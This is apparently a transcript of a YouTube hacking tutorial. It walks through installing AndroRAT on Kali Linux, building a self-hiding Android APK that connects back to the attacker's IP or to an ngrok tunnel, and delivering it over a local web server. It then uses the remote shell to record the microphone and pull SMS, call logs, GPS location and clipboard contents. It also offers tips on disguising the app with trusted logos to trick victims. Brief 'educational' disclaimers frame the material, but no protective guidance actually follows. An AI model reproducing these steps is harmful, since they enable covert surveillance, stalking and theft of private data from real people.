This channel does not promote or encourage any illegal activities. All contents provided by this channel is meant for educational purpose only.
How would you feel if I told you that right now someone could be secretly watching you through your phone's camera and listening in on all your conversations, even when you're not on a call? But here's the most disturbing part. They could also be reading your messages, tracking your location, or even accessing your photos without you having any idea it's happening. Hey guys, welcome back to Total Tech. In today's video, we're discussing one of the most dangerous tools hackers use to completely take over cell phones, AndroRAT. I'll show you exactly how attackers can create malicious applications that give them full control over a target's device, accessing everything from cameras and microphones to messages and location data. But more importantly, you'll also learn how to protect yourself from these devastating attacks. So if you guys enjoy this content, make sure you hit that like, subscribe, and notification bell so you don't miss out on any future videos. And as always, if you have any questions or need any help, please leave me a message in the comments below and I will get back to you. Now, let's jump right into it. We'll begin by updating our Kali Linux system. Open your terminal and run sudo apt update. This command refreshes our package database, ensuring that we have the latest information about available software. Next, let's run sudo apt upgrade. When prompted, type Y to continue. This installs the newest versions of all packages in our system. This might take a few minutes depending on how many updates are available. Now we need to install AndroRAT. Unlike some tools, AndroRAT isn't included in the default Kali Linux repositories, so we'll need to download it from GitHub. Open your browser and search for AndroRAT. Click the first result to open the GitHub repository. This is the official repository for the AndroRAT tool. Now we need to clone this repository to our local machine. Copy the URL from the address bar or from the green code button at the top of the page. Next, return to your terminal and type git clone followed by pasting the URL that we just copied. Then press enter to start the cloning process. Once the repository is cloned, we'll need to navigate to the AndroRAT directory. Type cd AndroRAT and press enter. Let's see what files we have by typing ls. You should see various files, including a requirements.txt file, which contains all the Python dependencies we'll need to install. Before installing the requirements, it's a good practice to create a virtual environment to keep our project dependencies isolated. This prevents conflict between different Python projects. Type python3-m venv to create a virtual environment named venv. Now we need to activate this virtual environment. Type source venv/bin/activate and press enter. You should notice your terminal prompt change, indicating that the virtual environment is now active. With our virtual environment set up, let's install the required dependencies by typing pip3 install -r requirements.txt. This might take a minute as it downloads and installs all the necessary packages. Now that AndroRAT is installed, we need to know our attacker machine's IP address to create our malicious application. Type ifconfig in your terminal and look for your machine's IP address. Typically, it's located under the ETH0 or WLAN0 interface. Make a note of this IP address. We'll need it for the next step. Now we're ready to create our malicious APK file. This APK is what will be installed on the target device, which will then establish a connection back to our attacker machine. Type python3 androrat.py --build-i followed by your IP address. Then type -p 8000-o rat.apk and press enter. Let me break down this command. Python3 androrat.py launches the AndroRAT tool. --build tells it to create a malicious APK file. -i followed by your IP address specifies where the infected device should connect back to. -p 8000 sets the port number for the connection, and -o rat.apk names our output file rat.apk. Attackers often use familiar logos like Google, Facebook, or system app icons to trick the user into trusting the app. However, for our demonstration, we will not be using this option because without specifying an icon, the app will automatically hide itself after installation, making it even harder to detect. You'll see Android start generating the APK file. What's happening behind the scenes is that the tool is creating an Android application embedded with malicious code that will connect back to our machine when installed. This process creates a fully functional Android application that appears legitimate to the users, but secretly contains hidden functionality that allows us to connect to the device from anywhere in the world. The generation might take a minute or two to complete. Once finished, you should see a message indicating that the APK file has been successfully created. The APK will then be saved in your current directory. In real-world attack scenarios, hackers often use social engineering techniques to trick users into installing malicious applications. They may disguise the app as a game, utility, or even as a normal update for your phone. This will allow them to distribute it via phishing emails, through third-party software apps, or even by sending it directly to your phone. For our demonstration, we'll use a simple method to transfer the APK to our test device. Let's move the APK file to our documents folder for easier access. Then we'll create a simple web server to allow our test device to download the file. Navigate to where you save the APK file and type python3-m http server 8080 to start the web server on port 8080. Now on your Android device, open a web browser and enter your attacker machine's IP address followed by :8080 in the address bar. You should see a directory listing that includes our rat.apk file. Tap on it to download the file to your Android device. Once downloaded, tap on the file to begin installation. Notice that after the installation and the initial launch, the app icon might disappear from the home screen. This is a technique commonly used by malware to hide itself from the user while continually to run silently in the background. Now that our malicious app is installed on the target device, let's return to our attacker machine and set up a listener to receive the connection. Type python3 AndroRAT.py --shell-i followed by your IP address. Then type -p 8000 and press enter. This command starts AndroRAT in listening mode. It's now waiting for the infected device to connect back to us. Within moments, you should see a message indicating that the device has connected. This means our malicious app has successfully established connection back to our attacker machine, and we now have remote access to the target device. You'll be presented with an interpreter prompt where you can enter various commands to control the target device. Let's explore some of these capabilities this gives us. First, let's see what cameras are available on the device. Type cam list and press enter. This command returns a list of available cameras on the device, typically showing both front and back cameras with their index numbers. Using these camera indices, we could take pictures or record videos without the user's knowledge. This is both extremely invasive and demonstrates why these tools are so dangerous. Now, let's try recording audio from the device's microphone. Type start_audio and press enter. This command activates the microphone on the target device and begins recording audio. The device gives no indication that this is happening, so the user would have no idea that their conversations are being recorded. After a few moments, type stop audio to stop the recording. The recorded audio file is automatically saved in the AndroRAT's dump folder. Let's check if the audio was saved successfully. Open the dumps folder and you should see an audio file. Play it and you'll hear whatever was captured from the target device's microphone. This could include private conversations, sensitive information, or any ambient audio near the device. Next, let's access the device's SMS messages. Type get SMS inbox and press enter. This command retrieves all incoming text messages from the target device and saves them to the dumps folder. You can also type get SMS sent to retrieve outgoing messages. This gives the attacker access to all text communications, which often contains personal information, authentication codes, or private conversations. Let's try accessing call logs. Type get call logs and press enter. This command retrieves the device's call history showing who the user has been communicating with. One of the most useful capabilities is location tracking. Type get location and press enter. This command retrieves the current GPS coordinates of the target device, effectively allowing an attacker to track someone's physical location without their knowledge. Another powerful feature is clipboard access. Type get clipboard data and press enter. This command retrieves whatever information is currently stored in the device's clipboard. This could include passwords, private messages, or any other text the user has copied. For a bit of mischief, you can even control the device's vibration function. Type vibrate 5 and press enter. This causes the target's device to vibrate 5 times, and while seemingly harmless, this demonstrates the level of control an attacker has over the physical functions of the device. Everything we've demonstrated so far works when both the attacker and target are on the same network. However, attackers rarely have this luxury in real-world scenarios. Instead, they need to establish a connection over the internet. This is why AndroRAT includes functionality to work with ngrok. ngrok is a service that creates secure tunnels to expose local servers to the internet. This would allow an attacker to control a device from anywhere in the world. Now, let me show you an even simpler way to create a malicious APK that works over the internet. Type python 3 AndroRAT.py /build --ngrok -o devil.apk and press enter. This command automatically handles the entire process. It starts the malicious APK file and starts the listener using ngrok service. If ngrok isn't already installed, AndroRAT will install it for you. You would then need to set up an ngrok account and configure it according to their requirements. The advantage of this method is that it automatically sets up a public URL that can be accessed from anywhere. The generated APK will connect back to your machine through ngrok servers regardless of what network the target is on. This capability makes tools like AndroRAT even more dangerous, as the attacker doesn't need to be physically near the target to maintain control of their device. The target could be anywhere in the world and the attacker would still have full control of their device. Remember, the knowledge shared in this video is meant to help you understand these threats and protect against them, never to cause harm. Always make sure you operate within legal and ethical boundaries. If you found this demonstration valuable for your cybersecurity journey, make sure you hit that like, subscribe, and notification bell. It really helps this channel reach more people who need this information. And again, if you have any questions about this or any of my other videos, please leave me a message in the comments below and I will get back to you. Thanks for stopping by, and I will see you in the next video.